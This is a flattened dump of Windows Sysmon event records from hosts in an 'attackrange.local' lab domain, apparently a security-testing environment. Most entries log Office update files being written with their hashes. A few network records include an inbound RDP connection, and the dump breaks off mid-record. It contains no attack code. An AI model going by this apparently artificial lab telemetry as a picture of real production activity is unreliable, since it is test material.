Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\PowerPntLogoSmall.contrast-white_scale-180.pngMD5=A58213CD2A2E0650839D6525EDCFAC44,SHA256=379A869C8329F8C2166DB26135F8581AB44655DC86488E572267E1AC2F06A22B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069122Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\PowerPntLogoSmall.contrast-white_scale-140.pngMD5=3DAD6AB27B511775EDBA75F96A794377,SHA256=4F2B670CCD930C02BC5B535D44D66D708A55442346753E3393478AB9DAFAA761,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069121Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\PowerPntLogoSmall.contrast-white_scale-100.pngMD5=B18BD50C089000D95FC60DB43B55FA22,SHA256=AD8A75E6852DA75726DB6F993AF617E2945ACA6BDD7E6D5BB503CBD111CC9ADD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069120Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\PowerPntLogoSmall.contrast-black_scale-80.pngMD5=A4C2A4EE2B28E6E751D553BF991675D4,SHA256=94556B63D4B9056140721657DD39A3C0FD439FB4DAABB11E427F139E8E146251,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069119Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\PowerPntLogoSmall.contrast-black_scale-180.pngMD5=F55E73EA96B8889194717ACA3823E334,SHA256=F3911F378E8FBB002984B39A9237AFC0A79B8265A168AC18260295F6628AB36D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069118Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\PowerPntLogoSmall.contrast-black_scale-140.pngMD5=98211330E27C9595BDD6D1766C175401,SHA256=E0A292536A4B7908CC1BD87E4FEEC117A321AB50B2D9FFA92882C60C12DDBB85,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069117Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\PowerPntLogoSmall.contrast-black_scale-100.pngMD5=37A9244AFC01F351012EF837C721E3E3,SHA256=3F319699BEF1922882D7BAC314978011E1E39C53F09AF5EEAD4E8926C714FDB5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069116Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\PowerPntLogo.scale-80.pngMD5=50961BFE7C6C02BD17FA086F0C9C4B8D,SHA256=CADE4FA7A67144A20011D6E9BF4211C13CDF094595916FA7FB47A4F75D853617,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069115Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\PowerPntLogo.scale-180.pngMD5=878E312655DD489BC328BE1068A5887C,SHA256=2D9E4943027B02BB7F774BB8DAD2B1E9BA0E455FEC0E89A19B46109D0900B645,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069114Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\PowerPntLogo.scale-140.pngMD5=7C435824B4DA347817BF63FDC32ED33D,SHA256=00B3C60961EB027A61568CDEF8F1D04DE4FD3E192392F658892B77EF82CADA03,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069113Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\PowerPntLogo.scale-100.pngMD5=5F5A8D21711488E83B0BD62CFCECA5F5,SHA256=1540497E79533861DAC588D8D010EDA0FAC729FF51D43E3095E71BAF4E637CC0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069112Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\PowerPntLogo.contrast-white_scale-80.pngMD5=A2D5B596A61EE7120A2C49953B79FA3E,SHA256=960C634CCF1BEFA46B70890FDFBB8A8C555D163A8C212553F54992BAA7459BD7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069111Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\PowerPntLogo.contrast-white_scale-180.pngMD5=7A35956DB6325F8A48C1BC2F354A4BA7,SHA256=EE22FB3714FAF7D0971759291404EEC6743EB189961872D8F8C4C689ADBE8324,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069110Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\PowerPntLogo.contrast-white_scale-140.pngMD5=C15915D01DC597155936FAFF86FA3C1F,SHA256=FDAEAE3A907ABD1A231F95DF85599269D053B5557F59B32D35CE028B59298BB9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069109Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\PowerPntLogo.contrast-white_scale-100.pngMD5=CE5F783328CD025C65B98876A9F3C6D0,SHA256=7D7F9B815B1DB2E5249FC672B5F24CADC630581887C0CF2DE3CCA63C21FFA690,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069108Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\PowerPntLogo.contrast-black_scale-80.pngMD5=4C87AC1FF734F5928D883E7F71F57151,SHA256=0C3EACCFCAF0CDAC806D3BE50F6DF3723F6063A25EBC5512C5189CC0DD5B62AD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069107Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\PowerPntLogo.contrast-black_scale-180.pngMD5=803479B630102E43AD88F2B2C3BED731,SHA256=5A10D9711F1DD1A3C6F7C975D0E218749419B83314E367308218AD5F524F1654,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069106Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\PowerPntLogo.contrast-black_scale-140.pngMD5=39277001D9FC16F3A4D53D25621AFAA8,SHA256=AC8A0F3F72805B151A91975CEB19020553B457DC97BDDC358600567E709BA1D1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069105Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\PowerPntLogo.contrast-black_scale-100.pngMD5=FAF5ACCDEDD36DFDC310BDC015A7276D,SHA256=F9D1D301FBBBF9824E869E5390EFE7FBF78E0257EF4A08B6D936ED4EFC480E2A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069104Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\OutlookLogoSmall.scale-80.pngMD5=B0629D0BDCC51AFCAE91E320B56F9766,SHA256=DAD7B0D8A04BF94355A30DDEAF3CCA1A7F1FACF277CF49A153B69F1671CADE16,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069103Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\OutlookLogoSmall.scale-180.pngMD5=04B841EC9F85F0471A549212CEFE025B,SHA256=3D2ED023AB0FBCFEFC800ED605926AE0927A9D42A200A2B700BF43F41E3E1FDB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069102Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.001{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\OutlookLogoSmall.scale-140.pngMD5=6D7B278CA4F507CFEF0789942CBD0844,SHA256=74D493C154DB7C74D190733153CCD58502D633DF1338E3C255F28B629AC6A6D7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069101Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.001{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\OutlookLogoSmall.scale-100.pngMD5=D6F0BA785BECA9BEFE0DD963E13C1266,SHA256=835B10FAC7B1E3FAD419B89AE941C09DE7E9ED98BDCD79DF9735B660CC8DCA19,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069100Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.001{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\OutlookLogoSmall.contrast-white_scale-80.pngMD5=3721AA15F100379D2EAC47BC8E8CC527,SHA256=FCC38626BD0C1FFDE678F4F7F810C6D98FB2CFEBC300B9DCC985142E4055041C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069099Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.001{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\OutlookLogoSmall.contrast-white_scale-180.pngMD5=6401ED5AF8DF66B7B7DDE6E16BCF5A7C,SHA256=B7362B1AE85AF811069F60FEBDC099E7DABD75CE9F4929BB202D395B22C5555B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069098Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.001{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\OutlookLogoSmall.contrast-white_scale-140.pngMD5=D684BDAFE90CF23D754D135413E348BA,SHA256=3C4443AD15F50AB0BD3F6439D1A82914BDE2A4053CA4FF93100D8FEB404D6933,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069097Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.001{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\OutlookLogoSmall.contrast-white_scale-100.pngMD5=248CA78B650FE42D4A0952661C8F289A,SHA256=9D7D089FABEB94C827204524F3A082A76E23F0B29B4EE9E71E98B1AF8334C964,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069096Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.001{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\OutlookLogoSmall.contrast-black_scale-80.pngMD5=7F32BC109C8407CF0827DF929700111A,SHA256=77A14876DB2FD9AF17D830B66E33B5ED40B010CF90EA77592B9F88E6450E8167,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069095Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.001{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\OutlookLogoSmall.contrast-black_scale-180.pngMD5=D0BB4B272E18B6DAF4726E0A907AD69E,SHA256=0392E20179E586C79B99E34F6F5825C33EAB8AEA51EC453BB712EA1B2F8035F8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069094Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.001{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\OutlookLogoSmall.contrast-black_scale-140.pngMD5=094EAC23C9DA5E6F86CCA49AE1251151,SHA256=192ACBB07B23C098C0FFDDC81E93CB10EC99223A1398055D9D24B6A181119868,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069093Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.001{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\OutlookLogoSmall.contrast-black_scale-100.pngMD5=F9C81E76096568BAB3E6EC7B04EF6C08,SHA256=BF75E15CDE168B96DC5A3E659F7CDEA92FC024020A8BDBBEB9DE752E53C78E6A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069092Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.001{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\OutlookLogo.scale-80.pngMD5=5FD4CB879FE9C28CD43979267559C3B4,SHA256=1E6238BECCCC47974F7A474B15F436828B6B7833BA91A67579E8D4A243EFCCF5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069091Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.001{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\OutlookLogo.scale-180.pngMD5=291FB560591860C10EAE66BDA8AA4485,SHA256=C8A0F308E793984F42A1573BAB857757114F3CC06E0389635A51A29598C87DFD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069090Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.001{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\OutlookLogo.scale-140.pngMD5=87648B6BFE090655EA2191BAF26EF89D,SHA256=3A51F1D0DB874D108B4033799E70A397EEA29B9020B44FED34B5B86811542086,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069089Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.001{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\OutlookLogo.scale-100.pngMD5=9BEDF2D3394137C6C4A601D169D3D175,SHA256=91CAD8F8D5B05FFE81ADFB9652E64E8F1C68B9123E1F58E9C10655B8CDFC437D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069088Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.001{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\OutlookLogo.contrast-white_scale-80.pngMD5=9C2DB90A2B7A2E4D80685009AE90E371,SHA256=414D3EAEC7AE95FAC6F8801C25E0E9964F1FC9D2BF38E40A821D49694BCD7876,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069087Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.986{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\OutlookLogo.contrast-white_scale-180.pngMD5=A3E244E74061B98FEFA4D00FF2F43AF8,SHA256=B95A08C2FE1506DB0E4D57879D95C991F8624ED16E8FA08B2A692239AF7DE0AC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069086Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.986{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\OutlookLogo.contrast-white_scale-140.pngMD5=0B8BA7FEFED82F98D6E1BEE660E7E6D8,SHA256=A19447793D5A83F38086E3FBDB29A388F2A9AEE6FA781B6E7C159FB0C42ECBB0,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049751Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:19.736{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52497-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x800000000000000049750Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:19.311{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-55852-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000049749Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:21.909{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E0FABBF083E79D4A38957935E4EE1A6E,SHA256=A6929CA0ED57B335741F2A01A43671FB67423151D50F009B003B549F235DFEBE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049748Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:21.846{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D52535E4A5CF4A318B2C03E8A623EF2C,SHA256=B55E01C33FA0BCE28B3C2AB95EC466F24944CAE7D2A616DFB4A607C002A8B42D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069297Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:22.814{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ODBC Drivers\Salesforce\lib\sfodbc.didMD5=FFB3606611396C4D93B19BF08C2E4A8A,SHA256=B42928EE42A300EE24F8B09B98B45BCA6C4FE1E66EAE46910BD25FDF84D1CD65,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069296Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:22.814{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ODBC Drivers\Salesforce\lib\sbicuuc58_64.dllMD5=B8C3F3F6EFC41A3FE1271052DBC478CC,SHA256=3679736225FC3DB8DF2BEBC11A147E0346087A0F80817EADAFDB68986817CA7F,IMPHASH=E3E94C33450289658D8F33B3507E44CCtruetrue 23542300x800000000000000069295Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:22.783{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ODBC Drivers\Salesforce\lib\sbicuin58_64.dllMD5=D773E023117A753B53F2D1F9B9A96119,SHA256=9A5DF9ECE210F100259443284F4330643E1557BD12C0FCB8A1DFC7E81AA70E56,IMPHASH=CAE492EF7EA8335582FD197F8448E553truetrue 23542300x800000000000000069294Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:22.751{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT 